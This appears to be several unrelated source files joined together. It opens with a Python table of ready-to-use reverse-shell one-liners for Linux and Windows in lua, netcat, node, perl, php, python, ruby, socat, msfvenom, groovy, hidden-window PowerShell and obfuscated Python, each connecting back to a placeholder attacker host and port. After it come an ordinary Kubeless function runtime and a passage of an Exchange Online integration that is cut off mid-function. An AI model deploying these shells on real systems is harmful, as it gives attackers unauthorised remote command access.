"""lua -e "require('socket');require('os');t=socket.tcp();t:connect('{lhost}','{lport}');os.execute('/bin/sh -i <&3 >&3 2>&3');" """,
"""lua5.1 -e 'local host, port = "{lhost}", {lport} local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'""",
),
'netcat': (
"""rm -f /tmp/.g;mkfifo /tmp/.g;cat /tmp/.g|/bin/sh -i 2>&1|nc {lhost} {lport} &>/tmp/.g""",
"""nc -e /bin/sh {lhost} {lport}""",
"""ncat {lhost} {lport} -e /bin/sh""",
),
'nodejs': (
"""!function()LEFTBRACKETvar e=require("net"),n=require("child_process").spawn("/bin/sh",[]),i=new e.Socket;i.connect({lport},"{lhost}",function()LEFTBRACKETi.pipe(n.stdin),n.stdout.pipe(i),n.stderr.pipe(i)RIGHTBRACKET)RIGHTBRACKET();""",
"""require('child_process').exec('nc -e /bin/sh {lhost} {lport}')""",
),
'perl': (
"""perl -e 'use Socket;$i="{lhost}";$p={lport};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))LEFTBRACKETopen(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");RIGHTBRACKET;'""",
),
'php': (
"""php -r '$sock=fsockopen("{lhost}",{lport});$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});exec("/bin/sh -i <&3 >&3 2>&3");'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});shell_exec("/bin/sh -i <&3 >&3 2>&3");'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});`/bin/sh -i <&3 >&3 2>&3`;'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});system("/bin/sh -i <&3 >&3 2>&3");'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});passthru("/bin/sh -i <&3 >&3 2>&3");'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});popen("/bin/sh -i <&3 >&3 2>&3", "r");'""",
),
'python': (
"""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{lhost}",{lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""",
"""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{lhost}",{lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/sh")'""",
"""python -c 'import sys,socket,os,pty;s=socket.socket();s.connect(("{lhost}",{lport}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'""",
),
'ruby': (
"""ruby -rsocket -e 'f=TCPSocket.open("{lhost}",{lport}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'""",
"""ruby -rsocket -e 'exit if fork;c=TCPSocket.new("{lhost}","{lport}");while(cmd=c.gets);IO.popen(cmd,"r")LEFTBRACKET|io|c.print io.readRIGHTBRACKETend'""",
),
'socat': (
"""wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat;/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{lhost}:{lport}""",
),
'war': (
"""msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -f war > reverse.war""",
),
},
'udp': {
'bash': (
"""/bin/bash -i >& /dev/udp/{lhost}/{lport} 0>&1""",
),
'netcat': (
"""ncat --udp {lhost} {lport} -e /bin/sh""",
),
},
},
'windows': {
'tcp': {
'groovy': (
"""String host="{lhost}";int port={lport};String cmd="cmd.exe";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())LEFTBRACKETwhile(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try LEFTBRACKETp.exitValue();break;RIGHTBRACKETcatch (Exception e)LEFTBRACKETRIGHTBRACKETRIGHTBRACKET;p.destroy();s.close();""",
),
'lua': (
"""lua5.1 -e 'local host, port = "{lhost}", {lport} local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'""",
),
'perl': (
"""perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"{lhost}:{lport}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'""",
),
'powershell': (
"""powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%LEFTBRACKET0RIGHTBRACKET;while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)LEFTBRACKET;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()RIGHTBRACKET;$client.Close()""",
"""powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%LEFTBRACKET0RIGHTBRACKET;while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)LEFTBRACKET;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()RIGHTBRACKET;$client.Close()" """,
),
'python': (
"""C:\Python27\python.exe -c "(lambda __y,__g,__contextlib: [[[[[[[(s.connect(('{lhost}',{lport})),[[[(s2p_thread.start(),[[(p2s_thread.start(),(lambda __out: (lambda __ctx: [__ctx.__enter__(),__ctx.__exit__(None,None,None),__out[0](lambda: None)][2])(__contextlib.nested(type('except',(),LEFTBRACKET'__enter__': lambda self: None,'__exit__': lambda __self,__exctype,__value,__traceback: __exctype is not None and (issubclass(__exctype,KeyboardInterrupt) and [True for __out[0] in [((s.close(),lambda after: after())[1])]][0])RIGHTBRACKET)(),type('try',(),LEFTBRACKET'__enter__': lambda self: None,'__exit__': lambda __self,__exctype,__value,__traceback: [False for __out[0] in [((p.wait(),(lambda __after: __after()))[1])]][0]RIGHTBRACKET)())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s,args=[s,p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p,args=[s,p]))]][0] for __g['p'] in [(subprocess.Popen(['\\\\windows\\\\system32\\\\cmd.exe'], stdout=subprocess.PIPE,stderr=subprocess.STDOUT,stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])(LEFTBRACKETRIGHTBRACKET),'p2s')]][0] for __g['s2p'],s2p.__name__ in [(lambda s,p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data'])>0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'],__l['p'] in [(s,p)]][0])(LEFTBRACKETRIGHTBRACKET),'s2p')]][0] for __g['os'] in [(__import__('os',__g,__g))]][0] for __g['socket'] in [(__import__('socket',__g,__g))]][0] for __g['subprocess'] in [(__import__('subprocess',__g,__g))]][0] for __g['threading'] in [(__import__('threading',__g,__g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))),globals(),__import__('contextlib'))" """,
),
'ruby': (
"""ruby -rsocket -e 'c=TCPSocket.new("{lhost}","{lport}");while(cmd=c.gets);IO.popen(cmd,"r")LEFTBRACKET|io|c.print io.readRIGHTBRACKETend'""",
),
}
},
}
|
kubeless.py
|
#!/usr/bin/env python
import os
import imp
import json
import logging
import datetime
from multiprocessing import Process, Queue
import bottle
import prometheus_client as prom
try:
import queue
except:
import Queue as queue
mod = imp.load_source('function',
'/kubeless/%s.py' % os.getenv('MOD_NAME'))
func = getattr(mod, os.getenv('FUNC_HANDLER'))
func_port = os.getenv('FUNC_PORT', 8080)
timeout = float(os.getenv('FUNC_TIMEOUT', 180))
memfile_max = int(os.getenv('FUNC_MEMFILE_MAX', 100*1024*1024))
bottle.BaseRequest.MEMFILE_MAX = memfile_max
app = application = bottle.app()
func_hist = prom.Histogram('function_duration_seconds',
'Duration of user function in seconds',
['method'])
func_calls = prom.Counter('function_calls_total',
'Number of calls to user function',
['method'])
func_errors = prom.Counter('function_failures_total',
'Number of exceptions in user function',
['method'])
function_context = {
'function-name': func,
'timeout': timeout,
'runtime': os.getenv('FUNC_RUNTIME'),
'memory-limit': os.getenv('FUNC_MEMORY_LIMIT'),
}
def funcWrap(q, event, c):
try:
q.put(func(event, c))
except Exception as inst:
q.put(inst)
@app.get('/healthz')
def healthz():
return 'OK'
@app.get('/metrics')
def metrics():
bottle.response.content_type = prom.CONTENT_TYPE_LATEST
return prom.generate_latest(prom.REGISTRY)
@app.route('/<:re:.*>', method=['GET', 'POST', 'PATCH', 'DELETE'])
def handler():
req = bottle.request
content_type = req.get_header('content-type')
data = req.body.read()
if content_type == 'application/json':
data = req.json
event = {
'data': data,
'event-id': req.get_header('event-id'),
'event-type': req.get_header('event-type'),
'event-time': req.get_header('event-time'),
'event-namespace': req.get_header('event-namespace'),
'extensions': {
'request': req
}
}
method = req.method
func_calls.labels(method).inc()
with func_errors.labels(method).count_exceptions():
with func_hist.labels(method).time():
q = Queue()
p = Process(target=funcWrap, args=(q, event, function_context))
p.start()
try:
res = q.get(block=True, timeout=timeout)
except queue.Empty:
p.terminate()
p.join()
return bottle.HTTPError(408, "Timeout while processing the function")
else:
p.join()
if isinstance(res, Exception) and not isinstance(res, bottle.HTTPResponse):
logging.error("Function returned an exception: %s", res)
raise res
return res
if __name__ == '__main__':
import sys
import requestlogger
loggedapp = requestlogger.WSGILogger(
app,
[logging.StreamHandler(stream=sys.stdout)],
requestlogger.ApacheFormatter())
bottle.run(loggedapp, server='cherrypy', host='0.0.0.0', port=func_port)
|
EWSO365.py
|
import random
import string
from typing import Dict
import dateparser
import chardet
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import sys
import traceback
import json
import os
import hashlib
from io import StringIO
import logging
import warnings
import email
from requests.exceptions import ConnectionError
from collections import deque
from multiprocessing import Process
import exchangelib
from exchangelib.errors import (
ErrorItemNotFound,
ResponseMessageError,
RateLimitError,
ErrorInvalidIdMalformed,
ErrorFolderNotFound,
ErrorMailboxStoreUnavailable,
ErrorMailboxMoveInProgress,
ErrorNameResolutionNoResults,
MalformedResponseError,
)
from exchangelib.items import Item, Message, Contact
from exchangelib.services.common import EWSService, EWSAccountService
from exchangelib.util import create_element, add_xml_child, MNS, TNS
from exchangelib import (
IMPERSONATION,
Account,
EWSDateTime,
EWSTimeZone,
Configuration,
FileAttachment,
Version,
Folder,
HTMLBody,
Body,
ItemAttachment,
OAUTH2,
OAuth2AuthorizationCodeCredentials,
Identity,
ExtendedProperty
)
from oauthlib.oauth2 import OAuth2Token
from exchangelib.version import EXCHANGE_O365
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
# Ignore warnings print to stdout
warnings.filterwarnings("ignore")
""" Constants """
APP_NAME = "ms-ews-o365"
FOLDER_ID_LEN = 120
MAX_INCIDENTS_PER_FETCH = 50
FETCH_TIME = demisto.params().get('fetch_time') or '10 minutes'
# move results
MOVED_TO_MAILBOX = "movedToMailbox"
MOVED_TO_FOLDER = "movedToFolder"
# item types
FILE_ATTACHMENT_TYPE = "FileAttachment"
ITEM_ATTACHMENT_TYPE = "ItemAttachment"
ATTACHMENT_TYPE = "attachmentType"
TOIS_PATH = "/root/Top of Information Store/"
# context keys
ATTACHMENT_ID = "attachmentId"
ATTACHMENT_ORIGINAL_ITEM_ID = "originalItemId"
NEW_ITEM_ID = "newItemId"
MESSAGE_ID = "messageId"
ITEM_ID = "itemId"
ACTION = "action"
MAILBOX = "mailbox"
MAILBOX_ID = "mailboxId"
FOLDER_ID = "id"
TARGET_MAILBOX = 'receivedBy'
# context paths
CONTEXT_UPDATE_EWS_ITEM = f"EWS.Items((val.{ITEM_ID} === obj.{ITEM_ID} || " \
f"(val.{MESSAGE_ID} && obj.{MESSAGE_ID} && val.{MESSAGE_ID} === obj.{MESSAGE_ID}))" \
f" && val.{TARGET_MAILBOX} === obj.{TARGET_MAILBOX})"
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT = "EWS.Items(val.{0} == obj.{1})".format(
ITEM_ID, ATTACHMENT_ORIGINAL_ITEM_ID
)
CONTEXT_UPDATE_ITEM_ATTACHMENT = ".ItemAttachments(val.{0} == obj.{0})".format(
ATTACHMENT_ID
)
CONTEXT_UPDATE_FILE_ATTACHMENT = ".FileAttachments(val.{0} == obj.{0})".format(
ATTACHMENT_ID
)
CONTEXT_UPDATE_FOLDER = "EWS.Folders(val.{0} == obj.{0})".format(FOLDER_ID)
# fetch params
LAST_RUN_TIME = "lastRunTime"
LAST_RUN_IDS = "ids"
LAST_RUN_FOLDER = "folderName"
ERROR_COUNTER = "errorCounter"
# headers
ITEMS_RESULTS_HEADERS = [
"sender",
"subject",
"hasAttachments",
"datetimeReceived",
"receivedBy",
"author",
"toRecipients",
"textBody",
]
UTF_8 = 'utf-8'
""" Classes """
class ProxyAdapter(requests.adapters.HTTPAdapter):
"""
Proxy Adapter used to add PROXY to requests
"""
def send(self, *args, **kwargs):
kwargs['proxies'] = handle_proxy()
return super().send(*args, **kwargs)
class InsecureProxyAdapter(NoVerifyHTTPAdapter):
"""
Insecure Proxy Adapter used to add PROXY and INSECURE to requests
NoVerifyHTTPAdapter is a built-in insecure HTTPAdapter class
"""
def send(self, *args, **kwargs):
kwargs['proxies'] = handle_proxy()
return super().send(*args, **kwargs)
class EWSClient:
def __init__(
self,
default_target_mailbox,
client_id,
client_secret,
tenant_id,
folder="Inbox",
is_public_folder=False,
request_timeout="120",
max_fetch=MAX_INCIDENTS_PER_FETCH,
self_deployed=True,
insecure=True,
proxy=False,
**kwargs,
):
"""
Client used to communicate with EWS
:param default_target_mailbox: Email address from which to fetch incidents
:param client_id: Application client ID
:param client_secret: Application client secret
:param folder: Name of the folder from which to fetch incidents
:param is_public_folder: Public Folder flag
:param request_timeout: Timeout (in seconds) for HTTP requests to Exchange Server
:param max_fetch: Max incidents per fetch
:param insecure: Trust any certificate (not secure)
"""
BaseProtocol.TIMEOUT = int(request_timeout)
self.ews_server = "https://outlook.office365.com/EWS/Exchange.asmx/"
self.ms_client = MicrosoftClient(
tenant_id=tenant_id,
auth_id=client_id,
enc_key=client_secret,
app_name=APP_NAME,
base_url=self.ews_server,
verify=not insecure,
proxy=proxy,
self_deployed=self_deployed,
scope="https://outlook.office.com/.default",
)
self.folder_name = folder
self.is_public_folder = is_public_folder
self.access_type = kwargs.get('access_type') or IMPERSONATION
self.max_fetch = min(MAX_INCIDENTS_PER_FETCH, int(max_fetch))
self.last_run_ids_queue_size = 500
self.client_id = client_id
self.client_secret = client_secret
self.account_email = default_target_mailbox
self.config = self.__prepare(insecure)
self.protocol = BaseProtocol(self.config)
def __prepare(self, insecure):
"""
Prepares the client PROTOCOL, CREDENTIALS and CONFIGURATION
:param insecure: Trust any certificate (not secure)
:return: OAuth 2 Configuration
"""
BaseProtocol.HTTP_ADAPTER_CLS = InsecureProxyAdapter if insecure else ProxyAdapter
access_token = self.ms_client.get_access_token()
oauth2_token = OAuth2Token({"access_token": access_token})
self.credentials = credentials = OAuth2AuthorizationCodeCredentials(
client_id=self.client_id,
client_secret=self.client_secret,
access_token=oauth2_token,
)
# need to add identity for protocol OAuth header
self.credentials.identity = Identity(upn=self.account_email)
config_args = {
"credentials": credentials,
"auth_type": OAUTH2,
"version": Version(EXCHANGE_O365),
"service_endpoint": "https://outlook.office365.com/EWS/Exchange.asmx",
}
return Configuration(**config_args)
def get_account(self, target_mailbox=None):
"""
Request an account from EWS
:param (Optional) target_mailbox: Mailbox associated with the requested account
:return: exchangelib Account
"""
if not target_mailbox:
target_mailbox = self.account_email
return Account(
primary_smtp_address=target_mailbox,
autodiscover=False,
config=self.config,
access_type=self.access_type,
)
def get_items_from_mailbox(self, account, item_ids):
"""
Request specific items from a mailbox associated with an account
:param account: EWS account or target_mailbox associated with that account
:param item_ids: item_ids of the requested items
:return: list of exchangelib Items
"""
# allow user to pass target_mailbox as account
if isinstance(account, str):
account = self.get_account(account)
else:
account = self.get_account(self.account_email)
if type(item_ids) is not list:
item_ids = [item_ids]
items = [Item(id=x) for x in item_ids]
result = list(account.fetch(ids=items))
result = [x for x in result if not isinstance(x, ErrorItemNotFound)]
if len(result) != len(item_ids):
raise Exception(
"One or more items were not found. Check the input item ids"
)
return result
def get_item_from_mailbox(self, account, item_id):
"""
Request a single item from a mailbox associated with an account
:param account: EWS account or target_mailbox associated with that account
:param item_id: item_id of the requested item
:return: exchangelib Item
"""
result = self.get_items_from_mailbox(account, [item_id])
if len(result) == 0:
raise Exception(f"ItemId {str(item_id)} not found")
return result[0]
def get_attachments_for_item(self, item_id, account, attachment_ids=None):
"""
Request attachments for an item
:param item_id: item_id of the item to retrieve attachments from
:param account: EWS account or target_mailbox associated with that account
:param (Optional) attachment_ids: attachment_ids: attachment_ids to retrieve
:return: list of exchangelib Item.attachments
"""
item = self.get_item_from_mailbox(account, item_id)
attachments = []
attachment_ids = argToList(attachment_ids)
if item:
if item.attachments:
for attachment in item.attachments:
if (
attachment_ids
and attachment.attachment_id.id not in attachment_ids
):
continue
attachments.append(attachment)
else:
raise Exception("Message item not found: " + item_id)
if attachment_ids and len(attachments) < len(attachment_ids):
raise Exception(
"Some attachment id did not found for message:" + str(attachment_ids)
)
return attachments
def is_default_folder(self, folder_path, is_public=None):
"""
Is the given folder_path public
:param folder_path: folder path to check if is public
:param is_public: (Optional) if provided, will return this value
:return: Boolean
"""
if is_public is not None:
return is_public
if folder_path == self.folder_name:
return self.is_public_folder
return False
def get_folder_by_path(self, path, account=None, is_public=False):
"""
Retrieve folder by path
:param path: path of the folder
:param account: account associated with the requested path
:param is_public: is the requested folder public
:return: exchangelib Folder
"""
if account is None:
account = self.get_account()
# handle exchange folder id
if len(path) == FOLDER_ID_LEN:
folders_map = account.root._folders_map
if path in folders_map:
return account.root._folders_map[path]
if is_public:
folder_result = account.public_folders_root
elif path == "AllItems":
folder_result = account.root
else:
folder_result = account.inbox.parent # Top of Information Store
path = path.replace("/", "\\")
path = path.split("\\")
for sub_folder_name in path:
folder_filter_by_name = [
x
for x in folder_result.children
if x.name.lower() == sub_folder_name.lower()
]
if len(folder_filter_by_name) == 0:
raise Exception(f"No such folder {path}")
folder_result = folder_filter_by_name[0]
return folder_result
def send_email(self, message: Message):
account = self.get_account()
message.account = account
message.send_and_save()
class MarkAsJunk(EWSAccountService):
"""
EWSAccountService class used for marking items as junk
"""
SERVICE_NAME = "MarkAsJunk"
def call(self, item_id, move_item):
elements = list(
self._get_elements(
payload=self.get_payload(item_id=item_id, move_item=move_item)
)
)
for element in elements:
if isinstance(element, ResponseMessageError):
return str(element)
return "Success"
def get_payload(self, item_id, move_item):
junk = create_element(
f"m:{self.SERVICE_NAME}",
{"IsJunk": "true", "MoveItem": "true" if move_item else "false"},
)
items_list = create_element("m:ItemIds")
item_element = create_element("t:ItemId", {"Id": item_id})
items_list.append(item_element)
junk.append(items_list)
return junk
class GetSearchableMailboxes(EWSService):
"""
EWSAccountService class used for getting Searchable Mailboxes
"""
SERVICE_NAME = "GetSearchableMailboxes"
element_container_name = f"{{{MNS}}}SearchableMailboxes"
@staticmethod
def parse_element(element):
return {
MAILBOX: element.find(f"{{{TNS}}}PrimarySmtpAddress").text
if element.find(f"{{{TNS}}}PrimarySmtpAddress") is not None
else None,
MAILBOX_ID: element.find(f"{{{TNS}}}ReferenceId").text
if element.find(f"{{{TNS}}}ReferenceId") is not None
else None,
"displayName": element.find(f"{{{TNS}}}DisplayName").text
if element.find(f"{{{TNS}}}DisplayName") is not None
else None,
"isExternal": element.find(f"{{{TNS}}}IsExternalMailbox").text
if element.find(f"{{{TNS}}}IsExternalMailbox") is not None
else None,
"externalEmailAddress": element.find(f"{{{TNS}}}ExternalEmailAddress").text
if element.find(f"{{{TNS}}}ExternalEmailAddress") is not None
else None,
}
def call(self):
elements = self._get_elements(payload=self.get_payload())
return [
self.parse_element(x)
for x in elements
if x.find(f"{{{TNS}}}ReferenceId").text
]
def get_payload(self):
element = create_element(f"m:{self.SERVICE_NAME}")
return element
class ExpandGroup(EWSService):
"""
EWSAccountService class used for expanding groups
"""
SERVICE_NAME = "ExpandDL"
element_container_name = f"{{{MNS}}}DLExpansion"
@staticmethod
def parse_element(element):
return {
MAILBOX: element.find(f"{{{TNS}}}EmailAddress").text
if element.find(f"{{{TNS}}}EmailAddress") is not None
else None,
"displayName": element.find(f"{{{TNS}}}Name").text
if element.find(f"{{{TNS}}}Name") is not None
else None,
"mailboxType": element.find(f"{{{TNS}}}MailboxType").text
if element.find(f"{{{TNS}}}MailboxType") is not None
else None,
}
def call(self, email_address, recursive_expansion=False):
try:
if recursive_expansion == "True":
group_members: Dict = {}
self.expand_group_recursive(email_address, group_members)
return list(group_members.values())
else:
return self.expand_group(email_address)
except ErrorNameResolutionNoResults:
demisto.results("No results were found.")
sys.exit()
def get_payload(self, email_address):
element = create_element(f"m:{self.SERVICE_NAME}")
mailbox_element = create_element("m:Mailbox")
add_xml_child(mailbox_element, "t:EmailAddress", email_address)
element.append(mailbox_element)
return element
def expand_group(self, email_address):
"""
Expand given group
:param email_address: email address of the group to expand
:return: list dict with parsed expanded group data
"""
elements = self._get_elements(payload=self.get_payload(email_address))
return [self.parse_element(x) for x in elements]
def expand_group_recursive(self, email_address, non_dl_emails, dl_emails=None):
"""
Expand group recursively
:param email_address: email address of the group to expand
:param non_dl_emails: non distribution only emails
:param dl_emails: (Optional) distribution only emails
:return: Set of dl emails and non dl emails (returned via reference)
"""
if dl_emails is None:
dl_emails = set()
if email_address in non_dl_emails or email_address in dl_emails:
return None
dl_emails.add(email_address)
for member in self.expand_group(email_address):
if (
member["mailboxType"] == "PublicDL"
or member["mailboxType"] == "PrivateDL"
):
self.expand_group_recursive(member.get("mailbox"), non_dl_emails, dl_emails)
else:
if member["mailbox"] not in non_dl_emails:
non_dl_emails[member["mailbox"]] = member
# If you are modifying this probably also need to modify in other files
def exchangelib_cleanup():
key_protocols = list(exchangelib.protocol.CachingProtocol._protocol_cache.items())
try:
exchangelib.close_connections()
except Exception as ex:
demisto.error("Error was found in exchangelib cleanup, ignoring: {}".format(ex))
for key, protocol in key_protocols:
try:
if "thread_pool" in protocol.__dict__:
demisto.debug(
"terminating thread pool key{} id: {}".format(
key, id(protocol.thread_pool)
)
)
protocol.thread_pool.terminate()
del protocol.__dict__["thread_pool"]
else:
demisto.info(
"Thread pool not found (ignoring terminate) in protcol dict: {}".format(
dir(protocol.__dict__)
)
)
except Exception as ex:
demisto.error("Error with thread_pool.terminate, ignoring: {}".format(ex))
""" LOGGING """
log_stream = None
log_handler = None
def start_logging():
global log_stream
global log_handler
logging.raiseExceptions = False
if log_stream is None:
log_stream = StringIO()
log_handler = logging.StreamHandler(stream=log_stream)
log_handler.setFormatter(logging.Formatter(logging.BASIC_FORMAT))
logger = logging.getLogger()
logger.addHandler(log_handler)
logger.setLevel(logging.DEBUG)
""" Helper Functions """
def get_attachment_name(attachment_name):
"""
Retrieve attachment name or error string if none is provided
:param attachment_name: attachment name to retrieve
:return: string
"""
if attachment_name is None or attachment_name == "":
return "demisto_untitled_attachment"
return attachment_name
def get_entry_for_object(title, context_key, obj, headers=None):
"""
Create an entry for a given object
:param title: Title of the human readable
:param context_key: Context key used for entry context
:param obj: Object to create entry for
:param headers: (Optional) headers used in the tableToMarkDown
:return: Entry object to be used with demisto.results()
"""
if len(obj) == 0:
return "There is no output results"
if headers and isinstance(obj, dict):
headers = list(set(headers).intersection(set(obj.keys())))
return {
"Type": entryTypes["note"],
"Contents": obj,
"ContentsFormat": formats["json"],
"ReadableContentsFormat": formats["markdown"],
"HumanReadable": tableToMarkdown(title, obj, headers),
"EntryContext": {context_key: obj},
}
def prepare_args(args):
"""
Prepare arguments to be used as the API expects it
:param args: demisto args
:return: transformed args
"""
args = dict((k.replace("-", "_"), v) for k, v in list(args.items()))
if "is_public" in args:
args["is_public"] = args["is_public"] == "True"
return args
def get_limited_number_of_messages_from_qs(qs, limit):
"""
Retrieve a limited number of messages from query search
:param qs: query search to execute
:param limit: limit on number of items to retrieve from search
:return: list of exchangelib.Message
"""
count = 0
results = []
for item in qs:
if count == limit:
break
if isinstance(item, Message):
count += 1
results.append(item)
return results
def keys_to_camel_case(value):
"""
Transform keys from snake to camel case (does nothing if no snakes are found)
:param value: value to transform
:return: transformed value
"""
def str_to_camel_case(snake_str):
components = snake_str.split("_")
return components[0] + "".join(x.title() for x in components[1:])
if value is None:
return None
if isinstance(value, (list, set)):
return list(map(keys_to_camel_case, value))
if isinstance(value, dict):
return dict(
(
keys_to_camel_case(k),
keys_to_camel_case(v) if isinstance(v, (list, dict)) else v,
)
for (k, v) in list(value.items())
)
return str_to_camel_case(value)
def get_last_run(client: EWSClient, last_run=None):
"""
Retrieve the last run time
:param client: EWS Client
:param last_run: (Optional) last run object
:return: last run dict
"""
if not last_run or last_run.get(LAST_RUN_FOLDER) != client.folder_name:
last_run = {
LAST_RUN_TIME: None,
LAST_RUN_FOLDER: client.folder_name,
LAST_RUN_IDS: [],
}
if LAST_RUN_TIME in last_run and last_run[LAST_RUN_TIME] is not None:
last_run[LAST_RUN_TIME] = EWSDateTime.from_string(last_run[LAST_RUN_TIME])
# In case we have existing last_run data
if last_run.get(LAST_RUN_IDS) is None:
last_run[LAST_RUN_IDS] = []
return last_run
def email_ec(item):
"""
Create entry context for an email
:param item: exchangelib.Item
:return: entry context dict
"""
return {
"CC": None
if not item.cc_recipients
else [mailbox.email_address for mailbox in item.cc_recipients],
"BCC": None
if not item.bcc_recipients
else [mailbox.email_address for mailbox in item.bcc_recipients],
"To": None
if not item.to_recipients
else [mailbox.email_address for mailbox in item.to_recipients],
"From": item.author.email_address,
"Subject": item.subject,
"Text": item.text_body,
"HTML": item.body,
"HeadersMap": {header.name: header.value for header in item.headers},
}
def parse_item_as_dict(item, email_address=None, camel_case=False, compact_fields=False):
"""
Parses an exchangelib item as a dict
:param item: exchangelib.Item to parse
:param (Optional) email_address: string mailbox
:param (Optional) camel_case: Is camel case
:param (Optional) compact_fields: Is compact fields
:return: Item as a dict
"""
def parse_object_as_dict(obj):
raw_dict = {}
if obj is not None:
for field in obj.FIELDS:
raw_dict[field.name] = getattr(obj, field.name, None)
return raw_dict
def parse_folder_as_json(folder):
raw_dict = parse_object_as_dict(folder)
if "parent_folder_id" in raw_dict:
raw_dict["parent_folder_id"] = parse_folder_as_json(
raw_dict["parent_folder_id"]
)
if "effective_rights" in raw_dict:
raw_dict["effective_rights"] = parse_object_as_dict(
raw_dict["effective_rights"]
)
return raw_dict
raw_dict = {}
for field, value in item._field_vals():
if type(value) in [str, str, int, float, bool, Body, HTMLBody, None]:
raw_dict[field] = value
raw_dict["id"] = item.id
if getattr(item, "attachments", None):
raw_dict["attachments"] = [
parse_attachment_as_dict(item.id, x) for x in item.attachments
]
for time_field in [
"datetime_sent",
"datetime_created",
"datetime_received",
"last_modified_time",
"reminder_due_by",
]:
value = getattr(item, time_field, None)
if value:
raw_dict[time_field] = value.ewsformat()
for dict_field in [
"effective_rights",
"parent_folder_id",
"conversation_id",
"author",
"extern_id",
"received_by",
"received_representing",
"reply_to",
"sender",
"folder",
]:
value = getattr(item, dict_field, None)
if value:
if isinstance(value, list):
raw_dict[dict_field] = []
for single_val in value:
raw_dict[dict_field].append(parse_object_as_dict(single_val))
else:
raw_dict[dict_field] = parse_object_as_dict(value)
for list_dict_field in ["headers", "cc_recipients", "to_recipients"]:
value = getattr(item, list_dict_field, None)
if value:
raw_dict[list_dict_field] = [parse_object_as_dict(x) for x in value]
if getattr(item, "folder", None):
raw_dict["folder"] = parse_folder_as_json(item.folder)
folder_path = (
item.folder.absolute[len(TOIS_PATH):]
if item.folder.absolute.startswith(TOIS_PATH)
else item.folder.absolute
)
raw_dict["folder_path"] = folder_path
if compact_fields:
new_dict = {}
# noinspection PyListCreation
fields_list = [
"datetime_created",
"datetime_received",
"datetime_sent",
"sender",
"has_attachments",
"importance",
"message_id",
"last_modified_time",
"size",
"subject",
"text_body",
"headers",
"body",
"folder_path",
"is_read",
]
if "id" in raw_dict:
